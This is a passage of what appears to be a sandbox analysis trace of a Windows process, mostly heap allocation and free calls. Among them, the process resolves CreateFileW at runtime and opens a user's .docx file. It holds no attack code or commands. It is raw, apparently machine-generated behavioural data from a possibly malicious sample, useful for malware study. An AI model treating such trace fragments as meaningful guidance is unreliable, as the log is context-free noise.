hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.235] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.236] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0077.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0077.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca550, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0077.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.237] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0077.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0077.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0077.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0077.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0077.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.237] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0077.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0077.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0077.238] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\NHgtkAPLnX.docx" (normalized: "c:\\users\\fd1hvy\\documents\\nhgtkaplnx.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0077.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0077.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0077.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0077.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0077.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0077.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.238] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0077.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0077.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0077.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.239] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0077.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0077.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0077.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0077.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.240] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0077.240] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0077.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0077.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.242] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0077.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0077.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0077.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.242] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0077.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0077.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0077.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.243] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) 